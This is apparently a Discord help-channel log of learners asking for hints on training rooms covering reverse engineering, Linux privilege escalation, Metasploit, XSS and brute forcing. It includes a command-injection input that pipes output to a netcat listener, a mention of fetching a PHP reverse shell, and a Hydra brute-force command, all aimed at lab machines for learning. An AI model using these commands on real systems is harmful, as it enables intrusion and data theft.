stuck fractal
#

Well that's wrong

grand pivot
#

so it is

ripe rock
#

i am following the tutorial in the pased if1 executable

#

same instruccions to get the value

#

and etc...

grand pivot
#

do it again so

#

are you sure you are looking at the right value? are you sure you are looking at the time just before the pop and ret instructions?

ripe rock
#

break points are in jge and jmp

stuck fractal
#

Are you using the if2 binary?

ripe rock
#

yes look at output:

#

(fcn) main 68
| int main (int argc, char **argv, char **envp);
| ; var int32_t var_ch @ rbp-0xc
| ; var int32_t var_8h @ rbp-0x8
| ; var int32_t var_4h @ rbp-0x4
| ; DATA XREF from entry0 (0x5601fb7ce50d)
| 0x5601fb7ce5fa 55 pushq %rbp
| 0x5601fb7ce5fb 4889e5 movq %rsp, %rbp
| 0x5601fb7ce5fe c745f4000000. movl $0, var_ch
| 0x5601fb7ce605 c745f8630000. movl $0x63, var_8h ; 'c' ; 99
| 0x5601fb7ce60c c745fce80300. movl $0x3e8, var_4h ; 1000
| 0x5601fb7ce613 8b45f4 movl var_ch, %eax
| 0x5601fb7ce616 3b45f8 cmpl var_8h, %eax
| ,=< 0x5601fb7ce619 7d0e jge 0x5601fb7ce629
| | 0x5601fb7ce61b 8b45f8 movl var_8h, %eax
| | 0x5601fb7ce61e 3b45fc cmpl var_4h, %eax
| ,==< 0x5601fb7ce621 7d0d jge 0x5601fb7ce630
| || 0x5601fb7ce623 8365f864 andl $0x64, var_8h
| ,===< 0x5601fb7ce627 eb07 jmp 0x5601fb7ce630
| ||`-> 0x5601fb7ce629 8145f4b00400. addl $0x4b0, var_ch
| || ; CODE XREF from main (0x5601fb7ce627)
| ``--> 0x5601fb7ce630 816dfce70300. subl $0x3e7, var_4h
| 0x5601fb7ce637 b800000000 movl $0, %eax
| 0x5601fb7ce63c 5d popq %rbp
\ 0x5601fb7ce63d c3 retq

stuck fractal
#

I mean you can dump assembly in here all you want

#

It's not really going to help

#

You need to analyse the memory when it's running

ripe rock
#

yes but you are asking if the file that i am running is if2 so my answer is a yes because the var_8h and var_4h are different from the first one

stuck fractal
#

That was a single question

#

There's more questions

ripe rock
#

yes the other question was if i am finding the correct value and yes i do i find the other question answers look

grand pivot
#

try to use "spoiler"

#

pls

steady stratus
#

Pls don't post answers @ripe rock

grand pivot
#

i did that room, i know the value is not 63

steady stratus
#

You can post screenshots of questions, just either blur or remove answers to others (:

ripe rock
#

thanks i forgot to use spoiler

grand pivot
#

so, try to use breakpoints to know which is the value

steady stratus
#

Even with a spoiler it would of been removed

ripe rock
#

break points are in jge1 jge2 and jmp

steady stratus
#

But yes, different breakpoints as Pelado suggested (:

ripe rock
#

also i try in cmp

grand pivot
#

try harder (and different)

ripe rock
#

what do you mean?

grand pivot
#

use breakpoints in another points

ripe rock
#

same

#

@grand pivot Same thing

#

@grand pivot can i share you screen to see it ?

steady stratus
#

Try more breakpoints

#

but try not to randomly guess either

ripe rock
#

No , i did use breakpoints(jge,jge,cmp,movl after first jge and andl,movl in var_8h first lines)

#

@steady stratus So you are telling me that i am wrong 6 times?

stuck fractal
#

If you're tried 6 times and been told your answer is wrong 6 times, then yes

white salmon
#

hello can anybody give me a hint on zeus ?

stuck fractal
#

It's not a public box, Elf

steady stratus
#

Mhm yeah, I mean If the answer you suspect it isn’t accepted on the website then...

#

I haven’t done that room in a long while so I’m not quite sure of the breakpoint @ripe rock. Though I don’t remember it being too hard, but the room isn’t aimed for me in that regard

#

Keep on trying man (: id run through it but I’m just about to log off gl with it

ripe rock
#

@steady stratus So you are more of website tan binary?

white salmon
#

@stuck fractal nwm i got in lmfao

stuck fractal
#

@white salmon Try harder.

white salmon
#

i just did 😛

stuck fractal
#

@ripe rock So, you set the breakpoints. Did you then dump the stack?

white salmon
#

for the record. im not looking at writeup ok??

ripe rock
#

@stuck fractal Yes i check for the values doing dr

stuck fractal
#

@ripe rock So you're just printing the registers?

steady stratus
#

@steady stratus So you are more of website tan binary?
@ripe rock How'd you mean?

stuck fractal
#

That's not going to get you very far

#

You're not looking for a register value

#

You're looking for a variable value, variables are on the stack

#

You need to dump part of the stack

ripe rock
#

@steady stratus That you know more of networking,websites but not to much in RE or malware analyst.

steady stratus
#

Ah gotcha, sorry haha. My degree specialises in malware analysis (: @ripe rock I just haven’t done that room in a long time so I need to look back on it :^)

ripe rock
#

@steady stratus You are now my hero jajaj that degree is difficult you need a good memory to keep on track variables in assembly, anyways thanks to @stuck fractal he give me the answer by saying "You're not looking for a register value" beacause in my notes i did it without doing px @rbp-whatever 🤣 beacause i want to not look my notes in order to prove that i learn it

stuck fractal
#

Remember the difference between registers and variables.

ripe rock
#

@stuck fractal Yes i will update my notes now

white salmon
#

How do I gunzip without permission on flag12 Linux Ctf room

stuck fractal
#

get permissions

#

You have 2 or 3 users

sharp crystal
#

Linux Walkthrough: trying to do the final question, the contents of /root/root.txt. I've found the other two users; I've discovered the "simple" user's password and can login, but I can't get into the other user account which is a sudo one. At this point, I'm stumped.

oblique cliff
#

Check users privileges and file owners

real storm
#

Room blue: It says to scan for an exploit and use it, and confirm whether it's working, but I get

[-] 10.10.210.255:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.

Edit: Solved!

visual tapir
#

glad you got it

shrewd verge
#

dogcat room, is there any hints on flag 2?=/

visual tapir
#

@shrewd verge i haven't done that room .-.

#

@real storm how is Blue going for you?

shrewd verge
#

been fuzzing for 2days.. still looking for more tutorials

visual tapir
#

@shrewd verge you've had a program running for 2 days??? there are problems like that??

real storm
#

I had a phonecall so I took a break. I think I was almost done with it

#

It's a walkthrough so I shouldn't be stuck at this at the very least

visual tapir
#

ok ^_^

shrewd verge
#

well i have no idea how to lfi for other flag.. only get the first one @visual tapir

sharp crystal
#

Linux Walkthrough: trying to discover contents of /root/root.txt. I binary-edited the /opt/rescue/shiba4 to change the cat'ed file to /root/root.txt, on the basis it is a suid binary and should be able to access root's directory. No, permission denied.

real storm
#

I'm confused. Did you get stuck or...?

glossy basin
#

@sharp crystal instead, try to find files which belong to each user (using find command) and see if you find anything useful

sharp crystal
#

@glossy basin Got it! thank you.

#

BTW, 'vim -b' doesn't honour the setuid flag when saving the file (why the first approach didn't work). Not sure if that's a bug or a feature. 🙂

mild eagle
#

In xss room keylogger Part am i doing something wrong every time I try to past a keylogger script the server stops also tried with the example keylogger

stuck fractal
#

@sharp crystal if you edit a suid binary, it loses the suid bit. Doesn't matter how.

grand pivot
#

Hello everyone

#

Im with goldeneye

#

in pop3 BF should i use rockyou or another wordlist?

oblique cliff
#

|| in the lord of the root room i have tried port knocking ports 1,2,3 but that doesnt open up any ports as it should, can someone help me out with the syntax of port knocking?||

white salmon
#

it is already finished

echo thunder
#

Can anyone suggest a dictionary for BookFace, because the fasttrack dictionary does not work.

#

?

stuck fractal
#

@echo thunder Rockyou

echo thunder
#

ok thanks

visual tapir
#

i use vim all the time, and im confused about what the vim room task 2 question 2 is asking me

#

like.. you just press " i " to insert and start typing lol

stuck fractal
#

@visual tapir Once you're in insert mode

#

You answered it right there

#

Think less hard.

visual tapir
#

the answer format is 6 chars, and its not "insert" or "INSERT"

#

wow.. nvm

#

a "LOT" less hard

#

kind of confusing question though to me at least

#

@stuck fractal thanks lol

swift falcon
#

[-] Handler failed to bind to <mypublic_ip>:4444:- -
[] Started reverse TCP handler on 0.0.0.0:4444
[
] Retrieving session ID and CSRF token...
[] Finding CSRF token...
[
] Uploading and deploying qfSElhAWa4t7XtO...
[] Uploading 6267 bytes as qfSElhAWa4t7XtO.war ...
[
] Executing qfSElhAWa4t7XtO...
[] Executing /qfSElhAWa4t7XtO/qxkRCwy0TJWm55NUGvp7o23M.jsp...
[
] Finding CSRF token...
[] Undeploying qfSElhAWa4t7XtO ...
[
] Exploit completed, but no session was created.

#

how to fix this

#

while im trying to do metasploit on ToolRus room

stuck fractal
#

@swift falcon Why do you have LHOST set to your public IP?

swift falcon
#

yes, i did

#

ohhh

#

ok

stuck fractal
#

It needs to be your VPN IP

swift falcon
#

just realized it

#

thanks

#

runs perfectly, thanks @stuck fractal

ripe hedge
#

i use vim all the time, and im confused about what the vim room task 2 question 2 is asking me
@visual tapir I hated that question and the answer is really really dumb

velvet flint
#

anyone have time for quick sanity check on Brainpan :)?

oblique cliff
#

Sure what’s up

velvet flint
#
root@brainpan:/root# whoami
root
root@brainpan:/root# 
#

@oblique cliff managed to figure it out ^^forgot my nopsled

ripe hedge
#

hmm, having some trouble with the Alfred box, I've tried several things to get into the Jenkins box, to no avail: bruteforcing is probably not going to work, tried with several potential usernames: bruce, and alfred (guessed from the server on port 80). Gobuster is no-go, there's nothing on 80, 8080 redirects everything to the login page. Metasploit doesn't seem to have anything that works, though having the version number would help narrow things down. ...and I am dumb, I hadn't tried the REALLY obvious user/password yet

#

login worked

steady stratus
#

what do you think is the "really obvious" user/password? why not give it a go? (rhetorical)

ripe hedge
#

yeah I just did it

steady stratus
#

You know the box is Jenkins, maybe that can help you figure out the password (more so then just the username jenkins)

ripe hedge
#

someone left the default superuser password 🙂

#

taking a while to sign in though, I might've accidentally ddosed the box

steady stratus
#

It's a windows box so can be a little bit sluggish - especially for stuff like first sign ins ^^

ripe hedge
#

it's also Java so fair point

steady stratus
#

yuisss (:

#

good ol java

ripe hedge
#

hey I use it every day at work...

#

it's alright when you're reasonably sane with it

steady stratus
#

Oh I didn't say anything bad there

#

you just interpreted it as so 😉

#

which confirms my point :PPP

ripe hedge
#

cracks the whip

#

I think I'm just going to reset the box...

hollow forum
#

@steady stratus can you plz help me more if possible

ripe hedge
#

well, thanks room for being a good rubber ducky 🦆 🙂

ripe hedge
#

whee got a shell

dark plover
#

room: HackBack2019
task: 4
question: 5
issue: The first flag recieved does not work, checked the writeups and it states the same flag.

#

Would be highly appreciated for any assistance!

stuck fractal
#

@dark plover Jurassic part?

#

Please don't post flags.

dark plover
#

Oh i am terribly sorry. Did not know

#

Yes that is correct,

stuck fractal
#

Known issue.

ripe hedge
#

and bingo root flag....that'll teach me to overthing this stuff

steady stratus
#

well played (:

ripe hedge
#

so in a writeup, do you list everything you did, or are these things edited to show the shortest path?

#

more or less

stuck fractal
#

A writeup should be a guide

#

But also explain

ripe hedge
#

gotcha

stuck fractal
#

at least IMO

ripe hedge
#

took some notes on this one

ripe hedge
#

is there a way to get the user/pass on the Alfred room without guessing?

#

or I suppose you're supposed to research defaults

solemn smelt
#

I believe that one was defaults iirc

ripe rock
#

Hello someone in here did the injection challenge?

stuck fractal
#

@ripe rock Don't ask to ask, just ask.

ripe rock
#

this question of almost the last task

#

Print out the MOTD. What favorite beverage is shown?

stuck fractal
#

Did you print out the motd?

ripe rock
#

What it means print out the only thing i did was cat to it

stuck fractal
#

That prints it to stdout

#

So yes

trail badger
#

im on the learn linux room on task 43. im trying to access the /root directory. could someone point me twords the right direction

trail badger
#

Never mind i figured it out

wide gorge
#

im doing madness from thm, and im on the stega part, ive notice the extension of the file is .jpg but on hex the header is png. ive tried changing and renaming it from both ends but still cant open the image, ive used binwalk, steghide, and stegextract but no luck

#

please enlighten me 😆

solemn smelt
#

I would look more into the hex of the header you spotted and maybe look into magic numbers

wide gorge
#

i was able to solve it by replacing the file signature of png to the signature of jpg in its headers

#

yet im stuck again with this cypher y2RPJ4QaPF!B 😆

#

tried rot 13, 47 and caesar nothin seems to match

#

and as far i know, there is no hash that matches it

wooden mist
#

where'd you get that?

wide gorge
#

from the ctf's hidden directory

#

i was just left with this "Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B"

real storm
#

Room: Blue
When I upload my launcher from PS Empire and run it, it says
"Could Not Find C:%~f0"
Edit: I'll forward this to #room-help

sharp crystal
#

Room Linux Challenges. Find flag12 where motd are stored. I've read the man page and tried the files where motd can be stored including /run, but no flag12. Hint?

white salmon
tidal sedge
sharp crystal
#

Nm, got it. Note to self: remember grep's -i flag.

verbal wedge
#

@ebon heron have you tried different combinations of bash operators?

ebon heron
#

@verbal wedge as || && and so on operators?

verbal wedge
#

Indeed

#

Also keep in mind nc won't work

#

So you'll need to research some different ways of spawning shells

ebon heron
#

I gotten it to give me a shell for www-data

verbal wedge
#

Well there ya go lol

ebon heron
#

but i suspect the last flag is in a certain folder

verbal wedge
#

Indeed. The only flag :)

ebon heron
#

i am blind facepalm

#

Thanks @verbal wedge

verbal wedge
#

Happens to the best of us

#

Aye

white salmon
#

hi there, In the room Injection Task 3 Blind Injection, when we try to test the rediction, there is a issue, the directory /var/www/html hasn't write permissions, as intermediate user i can circubemnt this problem, but if the idea is to demostrate Blind Injection this dosen't work:

input field

||ls -la /var/www |nc 10.8.12.175 1234

kali

nc -lnvp 1234
listening on [any] 1234 ...
.
.
drwxr-xr-x  4 root root 4096 May 26 01:47 html
stuck fractal
#

@white salmon It is still blind injection

#

You have code execution

#

You're choosing to redirect the output over the network via netcat

white salmon
#

yeap, first thing i tried, according to the room desc, was to redirect, it was only an observation to facility test to other users i think, that dont know how to redirect to necat

stuck fractal
#

You converted a blind RCE into regular RCE

#

That's all

#

It's still a blind RCE vuln

#

It asked you to redirect to a file

white salmon
#

ok Sorry i always think as a teacher, and ways to make my students understand, hehe

#

this was a question from them, they tried to redirect and see the result directly on http:/ip/result.txt, thanks

stuck fractal
#

@white salmon Interesting question, but as you can't write to the directory I don't think it'd work

white salmon
#

@white salmon Interesting question, but as you can't write to the directory I don't think it'd work
@stuck fractal Precisely that was the suggestion, that /var/www/html, have write permissions for www-data, so that it would be easier to test it, but this works well, it does not matter, Maybe can be a suggestion to the room's author, thanks again

stuck fractal
#

@white salmon I'm speaking to the author now, I think the directory was meant to be writeable by www-data

#

I managed to break the box in other ways

verbal wedge
#

Yes I apologize for the confusion

#

The goal was to just demonstrate simple blind injection which I feel I've accomplished but I will make the www-data directory writable by www-data

#

As suggested

white salmon
#

@verbal wedge thanks, this will make the room more educational, I think 🙂

verbal wedge
#

Yeah no problem. Simple oversight by me

#

Glad you liked it

#

Opening up write perms will make room for uh... interesting things

#

like wget a full php rev shell

odd nebula
#

Easter 4 on ctfcollectionvol2
@white salmon
Did you have any luck in figuring this out. I tried a bunch of stuff with sqlmap, but I don't know it well at all.
I will probably get stuck on Easter 5 as is an SQL thing again.
That room maybe above me at the mo, but couldn't find an SQL learny room in tryhackme either

stuck fractal
#

@odd nebula If you want to learn sql, I recommend sololearn

#

There's more SQLi content coming soon

white salmon
#

I've had my fair share of issues with it.

#

I haven't worked on it much, because I couldn't figure out what to read from the table.

odd nebula
#

@stuck fractal thanks again. I'll look into it.
Before I look blindly, is sololearn a leaning site like THM or is it here

stuck fractal
#

It's a programming learning platform

#

It's free, I personally think it's good

odd nebula
#

It's a programming learning platform
@stuck fractal
I'll go and see what I can find right now.
School school school haha

#

@stuck fractal looks interesting. I'll see what it brings.

#

I haven't worked on it much, because I couldn't figure out what to read from the table.
@white salmon
@NinjaJc01 recommended sololearn to me. I'll be looking there. It may help you too.

white salmon
#

I saw.

odd nebula
#

Of course.

bitter shadow
oblique cliff
#

got the ||disk|| on mr Robot and ||got the strings from it into a file|| any hints what I should be looking for in it?

white salmon
#

can have a hint on willow? i accessed the ||nfs export|| and found an ||rsa_keys file||
is that a rabbit hole?

inland onyx
#

It is not

#

Combine that with what you got on the webserver

white salmon
#

ok
are the keys supposed to be slices into the string or something?

pearl sparrow
#

@trail badger Would you be able to give me a hint on the learn linux? I am overthinking it.

inland onyx
#

Read the hint -- I, uh, wrote a whole blog post on RSA encryption/decryption with numeric keys

white salmon
#

ok

#

link?

inland onyx
#

Check the hint for the user flag

#

It's in there

white salmon
#

ok

#

thanks

trail badger
#

может быть @pearl sparrow

#

sorry i mean maybe

pearl sparrow
#

/m @trail badger hi

trail badger
#

I was just talking to someone in russian

white salmon
#

am i meant to bruteforce the ssh passphrase on willow?

#

@inland onyx or what?
i decrypted the rsa

#

and got the key

#

but it says it has a passphrase

#

and i am not able to bruteforce it with rockyou

inland onyx
#

Mhm. Bruteforce it

#

It'll work with rockyou

white salmon
#

ok

#

i guess i was just using only part of rockyou

ripe rock
#

@bitter shadow Did you finish the challenge?

#

@bitter shadow I complete the challenge.

shrewd verge
#

having trouble with room Steel Mountain

#

the CVE he ask for.. i look exploit-db but the answer incorrect?

#

the CVE he ask for.. i look exploit-db but the answer incorrect?
@shrewd verge solved.. no need CVE- includes in answer

vernal ridge
#

Can someone help on TASK 4 ==> #5 flag1 text [Web Exploitation] [Medium] Jurassic Park in HACKBACK 2019 , i found the first flag text , but when i copy paste the flag, it shows wrong flag

tidal sedge
#

@vernal ridge It's a known bug.

vernal ridge
#

sorry i dint know tht still

#

so there is nothing i can do?

tidal sedge
#

You could wait till Dark fixes it, or you could pm me and show me the incorrect flag and I'll send you the correct one.

vernal ridge
#

i have the incorrect flag, i shall PM you

bitter shadow
#

@ripe rock I went to sleep last night 😂

white quartz
#

I am new can anyone give me a hint for king of the hill carnage?

rancid crystal
#

@white quartz KOTH boxes are supposed to be rooted on your own. No one is going to help with that

white quartz
#

okk

#

i asked not for a clue

#

only for a hint

rancid crystal
#

only for a hint
@white quartz well i haven't rooted carnage yet either but i believe LFI/RCE is the right way to do it.

white quartz
#

thanks

indigo ridge
#

I have tried every thing.. I know.. php bash nc msf webscript

#

Help me .. anyone?

vernal ridge
#

@tidal sedge buddy i need help on task 10 #3

#

port knocking is not working

patent token
#

A port scanner should wake it up. I know mine does.

vernal ridge
#

i tried but the ssh is still filtered

vernal ridge
#

i tried configuring the ip tables too, but couldnt open the SSH port

vernal ridge
#

@tidal sedge can I DM about this buddy?

green frost
#

I'm obviously missing something with the XSS room getting Jack's cookie via stored XSS. I have a message posted with code that'll re-direct to my server, and I'm catching my own cookie when I refresh the page, but nothing from Jack.

white salmon
#

can i have a hint about willow? i think i'm being very stupid, i'm on the last part
i just found root's password, but i have no idea how to go forward

ripe hedge
#

login as root?

white salmon
#

i did

#

and i checked root.txt

#

and it says ||This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!||

ripe hedge
#

backtrack then

#

look back at everything you did

#

maybe something will be accessible now that wasn't earlier

white salmon
#

ok

white salmon
#

augh i feel stupid
idk how to go forward
i've gone back and looked at everything i did
nothing new

shrewd verge
#

errrmmm i having problem with steel mountain room

patent token
#

What's up?

shrewd verge
#

i did found the cve n it has on msf

#

but it doesnot work?

#

well i try to exec ping commands.. same issues

patent token
#

Need a bit more information than that. So you found the Metasploit exploit, and you input your settings. Did you ensure that you RHOST, RPORT, LHOST AND LPORT are correct?

#

Steel Mountain doesn't respond to pings if I remember correctly.

stuck fractal
#

IIRC that exploit also has SRV parameters

surreal kite
#

Hey ther! Can someone help with 1 task i cant get through ? (Lean Linux task 43)

patent token
#

I just set RHOST and RPORT with LHOST and LPORT according to my notes Ninja.

surreal kite
#

Hello 🙂

patent token
#

We saw your question. If/when someone is available to help with that one they will Xaw. 🙂

surreal kite
#

ok thanks 🙂

bitter shadow
#

Hi @surreal kite

#

what's your problem?

surreal kite
#

im trying to finish the Learn linux room and am stuck on the last task

#

only just figured out 2>>/dev/null is pushing all errors to null

#

but either way i need to access a file in /root/root.txt as other user

bitter shadow
#

I'm not sure what was the process of getting root on this machine

#

but try

#

sudo -l

surreal kite
#

i found a file with nice name: .sudo_as_admin_successful but no idea what to do with it

bitter shadow
#

I don't think that's relevant

#

oh wait, I think I remember

surreal kite
#

user shiba4 cant run sudo :/

stuck fractal
#

Nope

#

But maybe you can gain access to a user that can

surreal kite
#

the only users i can see are shiba1 2 3 4 and nootnoot

#

but cant see password for nootnoot

bitter shadow
#

try them one by one

#

and forget nootnoot

stuck fractal
#

What

#

No

#

That's misleading

#

Don't mislead people that ask for hints

bitter shadow
#

don't forget nootnoot

#

better?

stuck fractal
#

cat /etc/passwd will show you all the users

surreal kite
#

are all those users even the news mail lp etc ?

#

i can see noot as a user as well

bitter shadow
#

no, normally the last couple of users

surreal kite
#

ok thank you

stuck fractal
#

They are all users.

bitter shadow
#

and root being always at the top

stuck fractal
#

They are not all users that you created.

surreal kite
#

no im still stuck

#

the only one i can log in to are shiba1 and shiba4

bitter shadow
#

wait are you sure?

surreal kite
#

i know i did log into shiba 2 but dont remember the password for it

bitter shadow
#

look back at the questions

#

maybe you submitted the password

surreal kite
#

ok

stuck fractal
#

You can log in to all the shibas if you have reached task 43

bitter shadow
#

it's task 21

surreal kite
#

yeah found it and logged in but still cant run sudo -l

bitter shadow
#

and task 33

#

keep trying on all users

surreal kite
#

i dont think ive ever logged into shiba 3 or nootnoot or noot

stuck fractal
#

You have logged into shiba3

surreal kite
#

yeah

#

did i ?

stuck fractal
#

Yes

bitter shadow
#

if you followed along, yes

stuck fractal
#

in order to gain access to shiba4, you had to be shiba3

surreal kite
#

hmm ok

#

yeah i did all of that

#

let me check

#

you are right, shiba3:happynootnoises

#

but still no sudo luck

bitter shadow
#

keep trying....

surreal kite
#

can i please get a hint ? 😄 im stuck on this for a while

stuck fractal
#

Don't post the answers please @surreal kite

surreal kite
#

sorry!

stuck fractal
#

Look for files on the system that belong to each and every user. Investigate suspicious ones

bitter shadow
#

try using the find command

surreal kite
#

just a quick one, when i look for files through: find / -user shiba3 -type f 2>>/dev/null it shows lots of /proc/ files it wont be there will it ?

vernal ridge
#

Can someone help on TASK 10 ==> #3 flag3 HACKBACK 2019 , i got 4 ports, and the SSH port is filtered, i tried to open the ssh port by knocking the 4 ports i found, but i couldnt open the ssh port, then i looked into the walkthough from @minor bough but it neither worked

bitter shadow
#

probably not @surreal kite

torn mural
#

can anyone give a hint on the final stage of CTF 100?

white salmon
#

can i have a hint on getting the agent name for agent sudo?

shrewd verge
#

I just set RHOST and RPORT with LHOST and LPORT according to my notes Ninja.
@patent token oooo.. i gain now ..;D

surreal kite
#

omg finally found it!! that was difficult lol 😄

#

thank you ❤️

gusty wren
#

w ||test||

teal hull
#

any1 hints for task7 #3 RP: metasploit

patent token
#

Rikk.

#

Didn't you literally just finish #2?

teal hull
#

i finish it

patent token
#

Please don't just jump from task to task asking for hints without putting the work in first.

solemn smelt
#

rikk im going to just do you a favor and advise you to rule 13

teal hull
#

i'm new i dont know where to put hands on

stuck fractal
#

Google.

teal hull
#

i dont even know wot a socks server is

patent token
#

Ok. We are happy to help those who help themselves. If you need assistance with learning to research, we can even try to help with that.

solemn smelt
#

google it

patent token
#

If you don't know what a Socks4a server is, you can research that. It's a proxy server that allows you to connect through it to other machines, networks, etc. As for your Task7, #3 question, the answer is actually in the question itself.

#

I also recommend doing that room if you haven't already, and if you have, heading back there for another peek.

white salmon
#

so for this question "What is running on the higher port?" i nmap scanned udp for the ports and its asking for a 3 character answer ? can i get a hint

PORT STATE SERVICE
21/udp closed ftp
80/udp closed http
2222/udp closed msantipiracy

ebon heron
#

How did you setup the scan?

solemn smelt
#

how did you specify ports? it shouldnt pull up those ports if theyre closed you should run a -p- instead

ripe hedge
#

Why scan UDP?

stuck fractal
#

@white salmon Please state the room, task and question number

ripe hedge
#

I think I know the room, probably simple CTF

white salmon
#

yes it was ^ and my bad

#

but i got it figured out

ripe hedge
#

Usually helps to know where you are ;)

white salmon
#

yeah oops haha

wanton shuttle
#

guys any hint regarding the_final_exam binary on radare2 room.i cant quite figure out what the getpw function does

mild eagle
#

@wanton shuttle try and figure out what a special function does ||get-password ||

#

@wanton shuttle try and input some simple strings to help with that

median compass
#

Hey all, currently enjoying the delights of CTF100 but all jammed up on flag75, anyone about to give me a little nudge with a hint?

torn mural
#

@median compass you just need to search really really really hard. Then bang your head once you find it

median compass
#

lol @torn mural I really really really thought i had searched as hard as i could, i'll go search again and prepare for the head banging so, cheers!

torn mural
#

@median compass if it helps, linpeas might reveal something, although, still well hidden

median compass
#

back to the grind so, thanks again!

rotund skiff
#

hey stuck on learn linux task 33, mkdir test says permission denied. i see i don't have write access on the home directory but having trouble changing it if that's even what i'm supposed to do

stuck fractal
#

That means you're in the wrong working directory

#

You haven't moved to your home directory

#

/home != your home directory @rotund skiff

rotund skiff
#

alright found it hahah thanks

granite pelican
#

Hey I would love a hint for running Hydra in the ToolsRus room
I think I'm getting the syntax wrong somehow, first http-get-form was running but no hits, now its asking for http-get module, why idk..
hydra $IP -V -t 1 -l bob -P passwords.txt http-get "/protected:password=^PASS^:incorrect" -I

stuck fractal
#

Why do you have password= for http basic auth?

granite pelican
#

dont need that eh

stuck fractal
granite pelican
#

wow this is so much faster

rotund skiff
#

learn linux 43: i see a file in nootnoot, am i on the right track?

#

nevermnd file is empty

#

ooh got it

edgy cradle
#

@rotund skiff you got it? I'm working on it now, and found the same file about half an hour ago. I can log in as noot, but have not figured out how to log in to nootnoot or whether I'm on on track or not.

rotund skiff
#

@edgy cradle that file is not important. there is a file in one of the users that is important, you'll have to run a find command to find it. that file will give you more information

#

lmk if you need more info

edgy cradle
#

OK thank you!